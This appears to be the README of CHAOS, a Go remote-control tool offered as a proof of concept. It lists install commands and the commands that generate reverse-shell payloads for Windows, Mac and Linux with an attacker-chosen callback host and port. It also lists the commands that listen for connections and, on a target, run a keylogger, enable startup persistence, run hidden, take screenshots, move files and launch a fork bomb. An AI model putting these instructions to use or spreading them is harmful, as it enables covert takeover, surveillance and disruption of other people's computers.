CHAOS is a PoC that allow generate payloads and control remote operating systems.
Features
| Feature | Windows | Mac | Linux |
|---|---|---|---|
Reverse Shell | X | X | X |
Download File | X | X | X |
Upload File | X | X | X |
Screenshot | X | X | X |
Keylogger | X | ||
Persistence | X | ||
Open URL | X | X | X |
Get OS Info | X | X | X |
Fork Bomb | X | X | X |
Run Hidden | X |
Tested On
Kali Linux - ROLLING EDITION
How to Install
# Install dependencies
$ sudo apt install golang git -y
# Get this repository
$ go get github.com/tiagorlampert/CHAOS
# Get external golang dependencies (ARE REQUIRED GET ALL DEPENDENCIES)
$ go get github.com/kbinani/screenshot
$ go get github.com/lxn/win
$ go get github.com/matishsiao/goInfo
$ go get golang.org/x/sys/windows
# Maybe you will see the message "package github.com/lxn/win: build constraints exclude all Go files".
# It's occurs because the libraries are to windows systems, but it necessary to build the payload.
# Go into the repository
$ cd ~/go/src/github.com/tiagorlampert/CHAOS
# Run
$ go run main.goHow to Use
| Command | On HOST does... |
|---|---|
generate | Generate a payload (e.g. generate lhost=192.168.0.100 lport=8080 fname=chaos --windows) |
lhost= | Specify a ip for connection |
lport= | Specify a port for connection |
fname= | Specify a filename to output |
--windows | Target Windows |
--macos | Target Mac OS |
--linux | Target Linux |
listen | Listen for a new connection (e.g. listen lport=8080) |
serve | Serve files |
exit | Quit this program |
| Command | On TARGET does... |
|---|---|
download | File Download |
upload | File Upload |
screenshot | Take a Screenshot |
keylogger_start | Start Keylogger session |
keylogger_show | Show Keylogger session logs |
persistence_enable | Install at Startup |
persistence_disable | Remove from Startup |
getos | Get OS name |
lockscreen | Lock the OS screen |
openurl | Open the URL informed |
bomb | Run Fork Bomb |
clear | Clear the Screen |
back | Close connection but keep running on target |
exit | Close connection and exit on target |
Video
FAQ
Why does Keylogger capture all uppercase letters?
All the letters obtained using the keylogger are uppercase letters. It is a known issue, in case anyone knows how to fix the Keylogger function using golang, please contact me or open an issue.
Why are necessary get and install external libraries?
To implement the screenshot function i used a third-party library, you can check it in https://github.com/kbinani/screenshot and https://github.com/lxn/win. You must download and install it to generate the payload.
Contact
tiagorlampert@gmail.com